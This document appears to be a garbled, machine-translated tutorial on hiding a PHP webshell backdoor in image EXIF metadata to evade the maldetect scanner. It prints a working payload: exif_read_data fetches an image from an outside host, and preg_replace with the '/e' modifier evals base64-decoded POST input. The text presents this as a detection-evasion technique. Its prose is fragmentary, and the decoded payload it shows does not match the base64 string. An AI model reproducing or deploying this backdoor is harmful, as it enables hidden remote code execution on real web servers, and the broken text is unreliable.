Detailed analysis of webshe backdoor EXIF hiding

Demonstration with foreign r57 Series

First look at the webshell source code

Pay attention to base64 encoding. After decoding, execute php to generate

Upload File page,

Secure software scanning tools typically Scan System Searches

Find webshell backdoor code to find the backdoor, such

We use maldetect to analyze the r57

Webshell:

 

$ sudo /usr/local/maldetect/maldet --config-option quar_hits=0,quar_clean=0,clamav_scan=1 -a "/tmp/lin.php"Linux Malware Detect v1.4.2(C) 2002-2013, R-fx Networks (C) 2013, Ryan MacDonald inotifywait (C) 2007, Rohan McGovern This program may be freely redistributed under the terms of the GNU GPL v2maldet(92294): {scan} signatures loaded: 9011 (7145 MD5 / 1866 HEX)maldet(92294): {scan} building file list for /tmp/lin.php, this might take awhile...maldet(92294): {scan} file list completed, found 1 files...maldet(92294): {scan} 1/1 files scanned: 0 hits 0 cleanedmaldet(92294): {scan} scan completed on /tmp/lin.php: files 1, malware hits 1, cleaned hits 0maldet(92294): {scan} scan report saved, to view run: maldet --report 101113-1250.92294maldet(92294): {scan} quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294$ sudo maldet --report 101113-1250.92294malware detect scan report for MacBook-Pro-2.local:SCAN ID: 101113-1250.92294TIME: Oct 11 12:50:48 -0400PATH: /tmp/lin.phpTOTAL FILES: 1TOTAL HITS: 1TOTAL CLEANED: 0NOTE: quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294FILE HIT LIST:{MD5}base64.inject.unclassed.1 : /tmp/lin.php===============================================Linux Malware Detect v1.4.2 < proj@rfxn.com >

 

Apparently, maldetect scanned and found

Base64 php backdoor.

To avoid scanning, use EXIF to transmit data.

If you use a browser to view the source code, you can find unix

Add the string to the top code.

Next, upload the file and view the EXIF data.

, Php code segment in EXIF Standard Format

Insertion does not affect rendering of the image file itself.

Php built-in function exif_read_data allows Image

File Header, for example, facebook:

Therefore, you can use exif_read_data to read

Map defined on local or remote host

The file header contains our php code.

The format is as follows:

 

$exif = exif_read_data('http://ruo.me/exif.jpg');preg_replace($exif['Make'],$exif['Model'],'');

Download the remote image and set the $ exif Array

Variable assignment, through Definition Simulation:

$exif = exif_read_data('http://ruo.me/exif.jpg');var_dump($exif);

After execution, you will get the following output: The last step is to execute the php preg_replace function.

$ php ./get.phparray(9) {["FileName"]=>string(8) "exif.jpg"["FileDateTime"]=>int(0)["FileSize"]=>int(6159)["FileType"]=>int(2)["MimeType"]=>string(10) "image/jpeg"["SectionsFound"]=>string(13) "ANY_TAG, IFD0"["COMPUTED"]=>array(5) {["html"]=>string(23) "width="155" height="77""["Height"]=>int(77)["Width"]=>int(155)["IsColor"]=>int(1)["ByteOrderMotorola"]=>int(0)}["Make"]=>string(5) "/.*/e"["Model"]=>string(108) "eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));"}

 

$exif = exif_read_data('ruo.me/exif.jpg');
preg_replace($exif['Make'],$exif['Model'],'');

 

Note the regular expression used by the make variable.

Format/. */e, the code after base64 decryption will be executed:

 

if (isset($_POST["exif"])) {eval(stripslashes($_POST["exif"]));}

 

Check whether the post name is exif.

If yes, run eval.

Code of the exif_read_data and exif_replace Functions

Combined with the access backdoor.

This backdoor is widely used.

The encrypted base64 code, hundreds

Attacked instances: